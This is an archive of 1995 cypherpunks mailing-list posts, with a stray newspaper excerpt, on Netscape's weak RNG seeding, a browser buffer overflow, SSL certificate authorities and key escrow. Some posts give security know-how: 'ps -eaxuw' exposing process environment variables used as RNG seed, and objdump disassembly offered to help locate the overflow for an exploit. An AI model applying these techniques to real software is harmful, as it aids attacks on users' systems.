   Mr. Freeh said that encryption was a "public safety" issue,
   and he said law-enforcement agencies around the world "will
   not tolerate" the use of private data encryption to impede
   investigations. He said encryption had also been
   encountered in the Philippines in a plot to blow up an
   American jet and to assassinate Pope John Paul II (in that
   case, at least, one can presume the code was cracked.)

   It seems worthwhile to point out that even if the suspects
   in the child pornography sting, called Operation Innocent
   Images, used cryptography, that did not provide evidence
   that they were doing something illegal. Our legal system is
   predicated on the belief that one is innocent unless proved
   guilty, and there is no exception clause for technology.

   "Fortunately we are not yet at the point where the mere use
   of encryption overcomes the presumption of innocence," said
   David Sobel, staff counsel for the Electronic Privacy
   Information Center in Washington.

   Another point to remember is that the F.B.I. identified
   more than 100 suspects, and gathered sufficient information
   to warrant raids, using existing laws and enforcement
   techniques. On the other hand, there is no denying that
   child pornographers use data encryption to keep co-workers,
   family members and police from discovering their secrets.

   "We are involved in a couple of jobs every week resolving
   some kind of a child pornography investigation," said Eric
   K. Thompson, president of Access Data Inc. of Orem, Utah,
   a private company that specializes in cracking encrypted
   files for corporations and Government agencies.

   The Government's elite codebreakers at the National
   Security Administration are prohibited by law from using
   their talents against American citizens. The F.B.I. has its
   own code-breaking experts, but it routinely calls on
   independent experts like Access Data to help on some cases.

   After eight years of breaking into encrypted files, ranging
   from situations involving secretaries who simply forgot
   their passwords for important memos to cases involving
   corporate computer systems that were encrypted by
   disgruntled employees, Mr. Thompson has concluded:
   "Basically, the criminal element is becoming more computer
   literate, and they are discovering encryption. Files are
   becoming more difficult to break."

   Dorothy Denning, an expert in cryptography and a professor
   of computer science at Georgetown University in Washington,
   said she recognized the importance of encryption for
   businesses seeking to protect information. At the same
   time, she said, she also recognized the problems that
   law-enforcement agencies face because of cryptography.

   "So many people had been saying people in law enforcement
   weren't having this problem, and I didn't believe that,"
   Dr. Denning said. So in May, she said, she spent two days
   calling sources at law-enforcement organizations. "I came
   up with over 20 cases -- child pornography, terrorism,
   murder, embezzlement fraud, tax protesters, export
   violations -- and, in some cases, they were able to crack
   it, and others they couldn't," she said.

   What can be done? The Administration's plan is to seek
   voluntary compliance with a "key escrow" plan, which would
   enable citizens to use strong, private cryptography as long
   as a copy of the software "key" were made available to law
   enforcement officials.

   Last week, Mr. Freeh stressed that he preferred a voluntary
   approach. But "if consensus is impossible" on the
   encryption issue, he said, the F.B.I. might consider other
   approaches.

   The debate is certain to heat up as more information about
   Operation Innocent Images becomes known. There are no
   comforting answers, only an echo of advice from a time
   predating the Internet: There is no solution. Seek it
   wisely.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 10:09:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <199509251256.IAA27310@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25,  2:38, Phil Karlton sent the following to the NSA's mail
archives:
> Subject: Netscape "random" number seed generator code available
|| As is mentioned in the README, more will need to be done to find more
|| bits of entropy. (Too much of a good thing is still not enough.)
|| However the security team believes that the RNG seed is no longer the
|| weak link and candidate for attack.  So I am personally volunteering
|| to have my head shaved if a discovered deficiency in this code results
|| in an easily attacked generated seed. [You will be expected to show
|| your work. :-)]
||

Will you put a picture up on http://www.netscape.com/ if someone does find
a problem? 8-)

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 25 Sep 95 10:10:42 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251300.AA22090@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: m5@dev.tivoli.com (Mike McNally)
    Date: Mon, 25 Sep 1995 07:29:01 -0500
    
    I also have some doubts as to the randomness of this; I suspect
    that the kernel is rather deterministic in its scheduling
    practices.

I don't think that anyone has suggested otherwise.  I believe that
`clock skew' was the underlying source of randomness that Matt Blaze
mentioned in the message where I first saw that code.

In any case, a number of people have expressed interest in seeing
signs of non-random behavior.  As far as I know, no one has said
anything if they've found such signs.  I've tried to find some, but
only with very simple tests.  I generated a quarter megabits and found
that:

 - I can only compress it to about 32Kb, i. e. 256 k bits.  Tim May
   has suggested that compressibility is getting to be a good metric
   for entropy.

 - It seems to contain roughly equal numbers of:
    * 0s and 1s
    * 00s, 01s, 10s, and 11s
    * etc. I forget how high I checked.

 - It contains some rather long sequences of 0s and 1s.  I think on
   the order of 20.

I have no idea how reasonable it would be to use this approach in
Netscape, however if it were available as an option to generate, say
300 bits, I'd personally be plenty willing to let it chew up five
minutes while I get my morning caffeine.  I realize that some people
would not.  It certainly couldn't hurt to throw a few bits gathered
this way into the mix.  Also, it may be possible to get more than one
bit of entropy per second using this approach, I was merely showing
the code as Matt originally presented it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGanppNR+/jb2ZlNAQE2jQQAx1dj/WjMK4XeNr4mZxyW6G9TKL1ZKqOE
tkePnuEujXQDxoEy5UNGWo36NG1hn564wprdS5e4aCQwZaPhPOuXZTd9uPEWXdqq
j5WyNmzBqmSIlCU+wlEVnBpYWbgxdPC1Lx8ckkxxX07+F3B+ftibrfB+t7ysDDPC
LOJ2PCXr/7I=
=8lGs
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
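
The three quick checks described in the message above (compressibility, pattern counts, longest run), as an added Python example that is not code from the thread; the generators, seeds and the "sticky" source are constructed for illustration. It also runs the checks on a seeded PRNG, which passes all of them while being fully predictable, so a pass says nothing about how much entropy went in.

```python
# Added example (not from the thread): quick statistical checks on a bit stream.
import itertools
import os
import random
import zlib
from collections import Counter

NBITS = 256 * 1024  # "a quarter megabits", the sample size quoted in the message


def pack(bits):
    """Pack a list of 0/1 values into bytes, most significant bit first."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def unpack(data):
    """Expand bytes into a list of 0/1 values, most significant bit first."""
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def compression_ratio(bits):
    """Compressed size / original size; close to 1.0 means zlib found no structure."""
    packed = pack(bits)
    return len(zlib.compress(packed, 9)) / len(packed)


def pattern_spread(bits, width):
    """Worst relative deviation of any width-bit pattern count from a uniform split."""
    usable = len(bits) - len(bits) % width
    counts = Counter(tuple(bits[i:i + width]) for i in range(0, usable, width))
    expected = (usable // width) / 2 ** width
    worst = max(abs(counts[p] - expected)
                for p in itertools.product((0, 1), repeat=width))
    return worst / expected


def longest_run(bits):
    """Length of the longest run of identical consecutive bits."""
    best = current = 1
    for prev, nxt in zip(bits, bits[1:]):
        current = current + 1 if prev == nxt else 1
        best = max(best, current)
    return best


def quick_checks(bits):
    """Run all three checks and return the results as a dict."""
    return {
        "compression_ratio": round(compression_ratio(bits), 3),
        "spread_1bit": round(pattern_spread(bits, 1), 3),
        "spread_2bit": round(pattern_spread(bits, 2), 3),
        "longest_run": longest_run(bits),
    }


def seeded_prng_bits(seed, n=NBITS):
    """Deterministic Mersenne Twister output: no entropy once the seed is known."""
    rng = random.Random(seed)
    return [rng.getrandbits(1) for _ in range(n)]


def sticky_bits(seed, n=NBITS, p_repeat=0.75):
    """Constructed flawed source: each bit repeats the previous one with p_repeat."""
    rng = random.Random(seed)
    bits = [rng.getrandbits(1)]
    for _ in range(n - 1):
        bits.append(bits[-1] if rng.random() < p_repeat else 1 - bits[-1])
    return bits


def os_bits(n=NBITS):
    """Bits from the operating system's generator, for comparison."""
    return unpack(os.urandom(n // 8))


if __name__ == "__main__":
    samples = (("os.urandom", os_bits()),
               ("seeded PRNG (seed 1995)", seeded_prng_bits(1995)),
               ("sticky source (constructed)", sticky_bits(7)))
    for name, bits in samples:
        print(f"{name:28s} {quick_checks(bits)}")
```

The sticky source has balanced 0s and 1s, so only the two-bit counts, the compression ratio and the run length expose it.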




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Taht <mike@icanect.net>
Date: Mon, 25 Sep 95 10:08:47 PDT
To: cypherpunks@toad.com
Subject: Key signing at Miami Convention
Message-ID: <199509251301.JAA05080@alice.icanect.net>
MIME-Version: 1.0
Content-Type: text/plain


I am giving an internet security seminar at the 

"The Internet and World Wide Web" Conference at
the Miami Hyatt Regency, tomorrow, Tuesday, Sept 26,
all day.

I'll be armed with a laptop if there are folk attending that
want to sign and exchange PGP keys.

________________
Michael

--
Michael Taht		| "You got me hummin" 	   - B. Joel
VP, Technical Stuff	| "Ain't nobody's bizness" - Taj Mahal
mike@icanect.net	| "I'm from the government,
http://www.icanect.net	|  I'm here to help" 	   - Anon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Mon, 25 Sep 95 10:05:57 PDT
To: khijol!toad.com!cypherpunks@cygnus.com
Subject: Netscape flaw hits the big time
Message-ID: <199509251404.JAA08561@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Just heard on the CBS hourly radio news that Netscape will release a new 
version on Wednesday correcting a flaw that would "allow hackers access 
credit card numbers."

As usual, they got it all wrong, but what do you expect?
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGa29CS9AwzY9LDxAQHJwAQAlCcmPauUPnBIpBx5e5ZZpdnQZk5dhEMe
BMZe+aA+A0mZ6aqgiA8wzZyjbSkYMuzoUM+IQi4c4MraoWNXGAFfO+9dL4WMmdqI
AMBk6WaIoiYjCjCd7SNxETlh4+BaWICul/04isiiLE345j6VgU2xGtJZT4UJMurf
6/dy7ztSYEQ=
=P3jw
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:09:08 PDT
To: cypherpunks@toad.com
Subject: JAV_jiv
Message-ID: <199509251313.JAA08442@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-25-95. NYPaper:

   "Making the PC Come Alive. A Software Language That Puts
   You in the Picture." By John Markoff

      A new computer language known as Java is an emerging
      technology that many industry experts expect to be the
      next big thing in computing. Just as popular World Wide
      Web "browser" software like Netscape has transformed the
      Web from a scientist's research tool into a consumer
      medium over the last two years, many computer industry
      researchers and executives predict that the Java
      programming language will transport the Web to the next
      level.


   JAV_jiv  (17 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Sun, 24 Sep 95 17:47:19 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net>
Message-ID: <Pine.SOL.3.91.950925090641.7344B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 22 Sep 1995, David J. Bianco wrote:
> Has anyone given much thought to the feasibility of a man-in-the-middle
> attack against an SSL (or other similar) transaction?  To me, the
> possibility seems obvious, so I figure it must have been discussed before,
> though I haven't seen it.
....
> Since neither the browser nor the server perform any authentication checks,
> neither Bob nor Alice know they are really speaking to Mallet.  The best
> Alice can do is check the IP address of the client she's speaking to, but

Ah, err, the infamous problem of Netscape Navigator refusing to talk to 
SSL httpd's because they don't have a certificate issued by Verisign is 
caused by the client authenticating the Server certificate.
To get a Verisign signed x509 certificate requires quite a bit of proof 
that your company is who they claim they are.  So server authentication 
is used.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Mon, 25 Sep 95 10:07:19 PDT
To: cypherpunks@toad.com
Subject: (Another) WSJ article
Message-ID: <Pine.SUN.3.91.950925093325.14983A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


	 Netscape Software for Cruising Internet Is Found to
		      Have Another Security Flaw

Another security flaw that has long plagued the Internet has been
found in software by Netscape Communications Corp. and others, raising
concerns for the privacy and safety of information on the global
computer network.

The flaw in Netscape's popular Navigator software, which helps users
cruise the multimedia portion of the Internet known as the World Wide
Web, is the third defect in the software discovered by the
"Cypherpunks" discussion group in little over a month.

[end of excerpt--it's a long article]

The article quotes William Cheswick and Rich Lethin, and mentions the
cypherpunks several times.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:06:52 PDT
To: cypherpunks@toad.com
Subject: WSJ on Netscape Hole 3
Message-ID: <199509251351.JAA11538@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, September 25, 1995, p. B12.

   Netscape Software for Cruising Internet Is Found to Have
   Another Security Flaw

   By Jared Sandberg


   Another security flaw that has long plagued the Internet
   has been found in software by Netscape Communications Corp.
   and others, raising concerns for the privacy and safety of
   information on the global computer network.

   The flaw in Netscape's popular Navigator software, which
   helps users cruise the multimedia portion of the Internet
   known as the World Wide Web, is the third defect in the
   software discovered by the "Cypherpunks" discussion group
   in little over a month. Members of the Cypherpunk group,
   which includes mathematicians and hackers who discuss the
   security method of cryptography, last month broke
   Netscape's "key" that protects sensitive data by "brute
   force" -- the use of massive computing power. Last week,
   other members found a flaw that could let hackers
   essentially pick the lock in Netscape's software.

   Unlike the prior glitches, however, the latest flaw doesn't
   lend itself to the theft of multiple credit-card numbers.
   Instead, it could allow a savvy hacker to damage an
   Internet user's computer, such as crashing the computer or
   deleting files.

   "This is just another indication that Netscape isn't being
   careful," said William Cheswick, a security researcher at
   AT&T Corp.'s Bell Laboratories.

   Still, he said, the flaw goes well beyond Netscape. It
   first reared its head seven years ago when Cornell graduate
   student Robert Morris used it to create a "worm" that
   crippled thousands of computers on the Internet. Last
   February, the same kind of flaw was found in the popular
   Mosaic program created by the University of Illinois. But
   that strain of the flaw was more serious than its latest
   appearance because it affected the computers that store
   many users' credit-card numbers. Now experts are
   discovering that the flaw shows up in other so-called Web
   browsers such as Links and Arena.

   "We're so glad that the network dog dances, we don't
   realize that it's rabid," Mr. Cheswick said of the
   programming quality of many software packages.

   Marc Andreessen, vice president of technology at Netscape,
   said the company will issue fixes for the recent glitches
   later this week. He added that it's unclear whether
   anything other than temporarily crashing a user's computer
   could result from the recent flaw. But, he said, once users
   adopt the modified software, "this won't be around long
   enough to cause a problem."

   Some, however, worry that another variation of the flaw
   will prove more difficult to cope with in the coming
   months. Bruce Fancher, president of Phantom Access
   Technologies Inc., operator of the Mindvox Internet access
   service, said a variation of the security hole has been
   found in several Unix software packages, which run on
   thousands of Internet computers that contain users'
   credit-card numbers and other personal information. It
   could cause far more damage than the Netscape flaw, he
   said. "This is going to be a big problem," warned Mr.
   Fancher, adding that he's been told that hackers are
   already devising software toolkits to exploit the hole.
   "This flaw is an easy mistake to make, but it's also easy
   to fix," he said.

   The latest flaw came to light early Friday morning when a
   reader of the Cypherpunk mailing list discovered the glitch
   and posted a message to the Internet. Basically, the
   software on an end-user's machine allows for commands that
   are too long, letting an intruder tack on an extra line of
   damaging code that could crash the computer. Instead, the
   software should verify the length of the commands that
   computers accept.

   Security buffs concede that the recent round of security
   glitches found in several pieces of software, including a
   virus found in Microsoft Corp.'s Word program and security
   problems at America Online Inc., has shaken confidence in
   electronic commerce. But they say the publicity brings to
   light problems that will ultimately make software more
   secure. Richard Lethin, a graduate student at
   Massachusetts Institute of Technology who participates in
   the Cypherpunk discussion, said: "This technology for
   electronic commerce is ultimately going to be real
   important, but there might be some hiccups at the start."

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 25 Sep 95 10:05:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251359.JAA21321@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:
| 
|   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
| and feed it through the RNG hash.  On Unix and PC systems we feed the
| environment through the hash, so that would be a good place for a
| concerned user to put some random stuff of their own.

On a SunOS (or any BSD) box ps -e will get you environment variables.

ps -eaxuw
USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
root        53  0.0  0.0   68    0 ?  IW   Sep 19  0:02 portmap HOME=/
PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
root        68  0.0  0.0   16    0 ?  I    Sep 19  0:00  (biod)
root        58  0.0  0.0   40    0 ?  IW   Sep 19  0:00 keyserv HOME=/
PATH=/bin:/usr/bin:/usr/etc:/usr/ucb


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Mon, 25 Sep 95 10:05:14 PDT
To: cypherpunks@toad.com
Subject: RSA/Cylink arbitration agreement on-line
Message-ID: <199509251414.HAA29497@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


[I haven't seen this mentioned yet on the list...]

Cylink has been kind enough to put a copy of the arbitration panel's
decision on their web page.  Cylink's home page is www.cylink.com.  The
URL for the actual agreement is:

	http://www.cylink.com/arbtrn_1.html

Spin doctors aside, it doesn't look like either company gained much over
the other.  I'm not an attorney, but the way I read the agreement RSAREF
can continue to be used without violating the Stanford patents.  RSA DSI
cannot *sublicense* the Stanford patents to third parties, but can *sell
code* that practices the methods claimed in the Stanford patents.  That
code can then be incorporated into other products, which is exactly what
PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which
is covered by the RSAREF license agreement).

					--bal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Mon, 25 Sep 95 10:37:25 PDT
To: sameer <tcmay@got.net (Timothy C. May)
Subject: Re: Persistent Services Needed
Message-ID: <v02110102ac8c96b652cf@[204.179.132.9]>
MIME-Version: 1.0
Content-Type: text/plain


One way to establish persistent services is to use the DNS for indirection:
register a name for a service (or a set of services), which then point to
servers of those services by a DNS name. If the service needs to move
(hosts, net connections, etc), the only thing that changes is the DNS zone
file and the references to the service through the name stay exactly the
same. Hell, if your service requires no state information or can have
replicated data (e.g. DNS, FTP, WWW), you can use "round robin" techniques
with very low DNS RR TTL's to spread the service load over a bunch of
widely distributed hosts.

The NetBSD gang understand this principle: netbsd.org has several servers
all over the place:

E-mail to netbsd.org is handled at MIT.
www.netbsd.org is served up by WWU.EDU
ftp.netbsd.org is at CMU.

Perhaps Eric Hughes can be prevailed upon to permit "privacy.net" to be
used in this manner.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 25 Sep 95 10:46:18 PDT
To: cypherpunks@toad.com
Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
Message-ID: <199509251741.KAA04656@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I was thinking recently how the events of the past week or so
have turned me into a sort of a Netscape advocate. Granted, there are
bugs in Netscape, and there probably will be more bugs uncovered
(someone needs to write an exploit if they want themself & Ray to get
a T-shirt btw), but Netscape is interested in fixing problems and the
new 2.0 is doing encrypted email, probably with a really nice
interface (Haven't seen it yet, of course) and they are working to
make the 128-bit version downloadable. (The 128bit version is
available overseas already anyway, I hear.)

	The really big sticking point I see, however, is the
certification authorities. There is a single point of failure here and
that is at Verisign. This becomes a large problem I think if the
encrypted email that Netscape does requires personal x509 certificates (I
read that Verisign is issuing those for $9/each.) This is a problem
because for one thing I don't think Verisign will want to issue certs
to pseudonyms, and Netscape may not talk encrypted email to
non-certified people. (I am not sure)

	The solution to this, of course, is to allow Navigator to
accept alternate certification hierarchies, so we can set up a
Cypherpunks cert agency or a c2.org cert agency, which -will- sign
nym's keys, etc. The question exists though, as to whether or not
Netscape will allow for alternate agencies in Navigator.

	I haven't seen any mention of this feature in 2.0, so if the
feature exists in 2.0, then great! Otherwise, unless Netscape is going
to allow for alternate cert agencies on a specific timescale, I think
we have to do something about it in order to force the issue.

	Along the same lines of what happened recently-- because of
the exposed hole and the pressure put on Netscape, management was
finally willing to let some of the code be available for public
review. If something happened to show how relying on a single point of
failure such as Verisign was bad and resulted in much press &
publicity, then perhaps Netscape management would be convinced to
allow for alternate cert hierarchies..

	Some sort of hack which demonstrates this would be great. I am
feeling uncreative and can't think of anything effective short of
stealing Verisign's private key, but that would be pretty damn tough.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 25 Sep 95 10:46:32 PDT
To: rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Message-ID: <9509251742.AA21506@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Unfortunately, strdup is not posix compliant.  If you want to use
> >it and maintain portability, you'll have to write your own.
> 
> Er, you're kidding, right?  drand48 isn't in Posix either, for example.
> Someone who runs on Motif and Mac has strdup as the least of their
> worries.  But just in case it's stopping anyone:
> 	char *strdup(const char *x) { char *p;
> 	    return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0;
> 	}

Nah, I'm not kidding...I have to write code that runs on LOTS of platforms
including macs, pcs, and lots of variants of Unix...I assume there's a
lot of others that do as well...you have to make money where you can, and
even with free software given out to the net, you want to make it portable
as a matter of pride.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 25 Sep 95 09:56:22 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Decompiling Netscape
In-Reply-To: <199509221732.NAA17523@clark.net>
Message-ID: <9509251604.AA28123@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Ray Cromwell <rjc@clark.net>
    Date: Fri, 22 Sep 1995 13:32:57 -0400 (EDT)

       Anyone want to lend me a hand in finding and disassembling the
    routine responsible for the buffer overflow in Netscape? Or at least
    tell me how you did it. (I hope it wasn't done by single stepping thru 
    functions in GDB) I missed the whole Netscape RNG decompilation
    thread. You could win a T-shirt for your help!

Under Unix, you can use objdump, e.g.

 % objdump -d netscape

 netscape:     file format a.out-sunos-big

 No symbols in "netscape".
 Disassembly of section .text:
 00002020 clr  %fp
 00002024 ld  [ %sp + 0x40 ], %o0
 00002028 add  0x44, %sp, %o1
 0000202c sll  %o0, 2, %o2
 00002030 add  4, %o2, %o2
 00002034 add  %o1, %o2, %o2
 . . .

This should work wherever other GNU utilities work.  objdump is part
of GNU binutils.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 26 Sep 95 22:17:27 PDT
To: cypherpunks@toad.com
Subject: Re: Yet Another Alarmist TV Show About Child Molesters on the Ne
Message-ID: <m0sxorl-00032TC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:

It's called the Hegelian Diclectic(sp?) first postulated by William
Hegel (an ass) in Germany approx the 1600's as a method for social change
when none could otherwise be achieved.

> And the trashing will continue.  It is the classic scenario.
> Feed the media negative press clips about the entity you wish
> to discredit (here, the Net), e.g.:
> 1.  All those pedophiles out to lure your children;
> 2.  Big coverage on catching some of those pedophiles;
> 3.  First page coverage on breaking Netscape's code with the
>     headlines that your sensitive information such as your
>     credit card numbers, etc. can be retrieved (ignoring that
>     the reason was to show Netscape's poorly structured code
>     would allow this and, therefore, preventing it before it
>     could happen);
> 4.  Expect cryptology to crop up in the Oklahoma bombing trial.
>     There already has been articles of those involved having
>     allegedly used that *damned* Net to correspond.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 25 Sep 95 12:28:47 PDT
To: cypherpunks@toad.com
Subject: PM's Netscape rant
Message-ID: <199509251924.MAA05096@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I thoroughly enjoyed PM's vituperative, venomous, and vitriolic
Netscape rant. it just wouldn't be the cypherpunks list without 
the pit bull of the internet nipping at everyone's heels here
and slaying any unwarranted peace!! however I haven't seen any 
well-deserved rebuttals however, so..

I'm again going to be a netscape apologist and say, GEEZ, PM, 
will you take it easy, and untangle your underwear knots?

as has been pointed out numerous times, the encryption in the Netscape
code is designed to handle credit card number transport, *not*
actual cash transport. it's really silly to have more security
present than is available than the weakest link. it would be like
worrying about a fence around the white house when one is giving
open tours to the public every day!!

PM is rather secretive about the systems he is working on, but
I suspect they are stock systems that must be highly secure because
they actually involve *transfer* of cash, and *large*amounts* of it,
in a *time-critical* environment, with *large corporate clients*.  these
are all inappropriate criteria to judge Netscape by.  in the Netscape 
scenario, the software is *not* transferring cash itself, *not* transferring 
large amounts of it, and *not* in a time critical application, and *not*
geared toward large corporations, but instead individual users. 
it is relying on another infrastructure (credit cards) for the actual 
transaction mechanisms. 

as has been pointed out numerous times, the whole
credit card apparatus is somewhat based on "security through obscurity", 
i.e. the obscurity of a credit card number, and it doesn't make a whole
lot of sense to try to make this more "secure". this is a problem for
credit card companies to fix (I agree it is a horrible problem, that costs
us billions, and should have been fixed a long time ago) .. but holding
credit card *using* companies responsible for this deficiency 
doesn't make sense. they are not the enemy!! they would surely seize the
most secure mechanism available, if there were alternatives.

the distinction is subtle, but I think a relevant one: is
the software itself transferring cash, or building on another system
that does so? hopefully in the latter case, the requirements for a
successful implementation are not so difficult to achieve (so that
even fresh-out-of-college CS students can call the functions to
do so, and perhaps code packages are written such that the user
is protected from their own naivete, or what PM would call stupidity
or incompetence).

--

PM gives some excellent techniques for improving code security (some
of these may not be exactly what he proposed):

1. hiring experts
2. code reviews
3. restrictions of who can work on what code (security clearance)
4. heavy testing
5. antagonistic attacks (i.e. hiring someone trying to crack the code that
others have written)
6. open review of key code

however, put all these things together and you get a company apparatus
a bit more like the NSA than a commercial company. I agree that all
these precautions are relevant for banking and stock transaction software
transferring millions of dollars.  but holding a joe-schmoe GUI and 
Web company responsible for this kind of paranoid oversight is really 
impossible and unrealistic and *unnecessary*.

there will be some companies that specialize in creating the 
*secure*infrastructure* for communications transactions. other companies
will just *latch on* to this existing infrastructure. hopefully the
requirements for *latching on* will not be too difficult, otherwise we
are all in trouble!! 
 
now, admittedly, it would be ideal if the netscape code was highly
secure, but again, I just don't think it is in the best interests of
this company to become security paranoid to the degrees that I have
listed above, and the extreme degrees that people here are ranting about. 
rather they should try to blend in with other companies
who specialize in cryptographic security. the latter companies should
as much as possible provide foolproof modules. they should take care
of all functions that have a potential for problem, such as random
number generation, key exchange, etc.  they should try to provide
a minimum of training where the code is not foolproof.

many have been making the point that one cannot judge the security of
a package based simply on analyzing key modules. I actually don't think this 
has been proven in general and completely resolved yet. I can imagine 
modules that communicate with software such that the module 
itself is a "secure environment" in general, and
it is almost impossible to misuse the software itself. (for example,
the software might never store the actual keys of transactions itself, 
this being handled by a secure module, making it impossible to 
accidentally reveal them).

some day we might actually see "secure module support" built into a 
microprocessor. in many ways the microprocessors that guard against
illegal memory accesses and illegal function calls are in a sense
providing a kind of cryptographic security. and people who study
secure OSes generally eventually conclude that for ultimate security,
you almost have to work from the ground up, starting with memory,
microprocessors, and network hardware.

--

so my general point is that PM's rant, while lots of fun to read..

>you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
>REAL code!! us old timers were writing code as secure and impenetrable
>as granite bricks, impregnable as a frigid victorian grandmother,
>before you were a twinkle in your mama's eye!! learn some
